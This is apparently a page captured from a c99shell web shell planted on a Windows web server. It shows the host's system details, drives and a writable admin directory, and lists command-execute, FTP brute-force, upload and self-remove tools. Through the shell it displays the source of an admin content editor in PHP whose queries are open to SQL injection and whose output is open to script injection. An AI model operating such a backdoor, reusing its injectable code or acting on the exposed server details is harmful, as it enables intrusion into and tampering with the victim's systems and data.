!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\admin\files\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     contenidos.php (6.63 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../../Connections/oa.php'); ?>
<?php
function GetSQLValueString($theValue$theType$theDefinedValue ""$theNotDefinedValue ""
{
  
$theValue = (!get_magic_quotes_gpc()) ? addslashes($theValue) : $theValue;

  switch (
$theType) {
    case 
"text":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;    
    case 
"long":
    case 
"int":
      
$theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case 
"double":
      
$theValue = ($theValue != "") ? "'" doubleval($theValue) . "'" "NULL";
      break;
    case 
"date":
      
$theValue = ($theValue != "") ? "'" $theValue "'" "NULL";
      break;
    case 
"defined":
      
$theValue = ($theValue != "") ? $theDefinedValue $theNotDefinedValue;
      break;
  }
  return 
$theValue;
}

$editFormAction $HTTP_SERVER_VARS['PHP_SELF'];
if (isset(
$HTTP_SERVER_VARS['QUERY_STRING'])) {
  
$editFormAction .= "?" $HTTP_SERVER_VARS['QUERY_STRING'];
}

if ((isset(
$HTTP_POST_VARS["MM_update"])) && ($HTTP_POST_VARS["MM_update"] == "form1")) {
  
$updateSQL sprintf("UPDATE contenidos SET idcat=%s, orden=%s, tema=%s, titulo=%s, textoinicial=%s, textocompleto=%s, enlace=%s, imagen=%s WHERE idcontenido=%s",
                       
GetSQLValueString($HTTP_POST_VARS['idcat'], "int"),
                       
GetSQLValueString($HTTP_POST_VARS['orden'], "int"),
                       
GetSQLValueString($HTTP_POST_VARS['tema'], "int"),
                       
GetSQLValueString($HTTP_POST_VARS['titulo'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['textoinicial'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['textocompleto'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['enlace'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['imagen'], "text"),
                       
GetSQLValueString($HTTP_POST_VARS['idcontenido'], "int"));

  
mysql_select_db($database_oa$oa);
  
$Result1 mysql_query($updateSQL$oa) or die(mysql_error());

  
$updateGoTo "../edit_contenidos.php";
  if (isset(
$HTTP_SERVER_VARS['QUERY_STRING'])) {
    
$updateGoTo .= (strpos($updateGoTo'?')) ? "&" "?";
    
$updateGoTo .= $HTTP_SERVER_VARS['QUERY_STRING'];
  }
  
header(sprintf("Location: %s"$updateGoTo));
}

$cont_rsCont "0";
if (isset(
$cont)) {
  
$cont_rsCont = (get_magic_quotes_gpc()) ? $cont addslashes($cont);
}
mysql_select_db($database_oa$oa);
$query_rsCont sprintf("SELECT * FROM contenidos where idcontenido=%s ORDER BY titulo"$cont_rsCont);
$rsCont mysql_query($query_rsCont$oa) or die(mysql_error());
$row_rsCont mysql_fetch_assoc($rsCont);
$totalRows_rsCont mysql_num_rows($rsCont);
?>
<html>
<head>
<title>Documento sin t&iacute;tulo</title>
<!-- tinyMCE -->
<script language="javascript" type="text/javascript" src="/tinymce/jscripts/tiny_mce/tiny_mce.js"></script>
<script language="javascript" type="text/javascript">
tinyMCE.init({
    theme : "advanced",
    language : "es",
    theme_advanced_resizing : true,
    theme_advanced_disable : "cleanup,code,help,styleselect,cut,copy,paste",
    mode : "textareas",
    plugins : "table,advhr,advimage,emotions,iespell,insertdatetime,preview,flash,searchreplace,print,contextmenu,iwimg",
    theme_advanced_buttons1_add_before : "save,separator",
    theme_advanced_buttons1_add : "fontselect,fontsizeselect, iwimg",
    theme_advanced_buttons2_add : "separator,insertdate,inserttime,preview,zoom,separator,forecolor,backcolor",
    theme_advanced_buttons3_add : "emotions,iespell,flash,advhr,separator,print",
    theme_advanced_buttons2_add_before: "cut,copy,paste,separator,search,replace,separator",
    theme_advanced_buttons3_add_before : "tablecontrols,separator",
    theme_advanced_toolbar_location : "top",
    theme_advanced_toolbar_align : "center",
    theme_advanced_path_location : "bottom",
    plugin_insertdate_dateFormat : "%Y-%m-%d",
    plugin_insertdate_timeFormat : "%H:%M:%S",
    extended_valid_elements : "a[name|href|target|title|onclick],img[class|src|border=0|alt|title|hspace|vspace|width|height|align|onmouseover|onmouseout|name],hr[class|width|size|noshade],font[face|size|color|style],span[class|align|style]",
    external_link_list_url : "tinymce/example/example_link_list.js",
    external_image_list_url : "tinymce/example/example_image_list.js",
    flash_external_list_url : "tinymce/example/example_flash_list.js",
relative_urls : false,
remove_script_host : true,
document_base_url : "http://observatorio.dama.gov.co/",
    theme_advanced_buttons3_add : "pastetext,pasteword,selectall"
});
function convertWord(type, content) {
    switch (type) {
        // Gets executed before the built in logic performes it's cleanups
        case "before":
            content = content.toLowerCase(); // Some dummy logic
            break;

        // Gets executed after the built in logic performes it's cleanups
        case "after":
            content = content.toLowerCase(); // Some dummy logic
            break;
    }

    return content;
}

</script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<table width="600" border="1" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
    <td><form name="form1" method="POST" action="<?php echo $editFormAction?>">
        <p> 
          <input name="idcontenido" type="hidden" id="idcontenido" value="<?php echo $row_rsCont['idcontenido']; ?>">
          <input name="idcat" type="hidden" id="idcat" value="<?php echo $row_rsCont['idcat']; ?>">
          <input name="orden" type="hidden" id="orden" value="<?php echo $row_rsCont['orden']; ?>">
          <input name="enlace" type="hidden" id="enlace" value="<?php echo $row_rsCont['enlace']; ?>">
          <input name="imagen" type="hidden" id="imagen" value="<?php echo $row_rsCont['imagen']; ?>">
        </p>
        <p> 
          <input name="tema" type="text" id="tema" value="<?php echo $row_rsCont['tema']; ?>">
        </p>
        <p> 
          <textarea name="titulo" cols="100" rows="8" id="titulo"><?php echo $row_rsCont['titulo']; ?></textarea>
        </p>
        <p> 
          <textarea name="textoinicial" cols="100" rows="15" id="textoinicial"><?php echo $row_rsCont['textoinicial']; ?></textarea>
        </p>
        <p> 
          <textarea name="textocompleto" cols="100" rows="15" id="textocompleto"><?php echo $row_rsCont['textocompleto']; ?></textarea>
          <br>
          <input type="submit" name="Submit" value="Enviar">
        </p>
        <input type="hidden" name="MM_update" value="form1">
      </form></td>
  </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result
($rsCont);
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--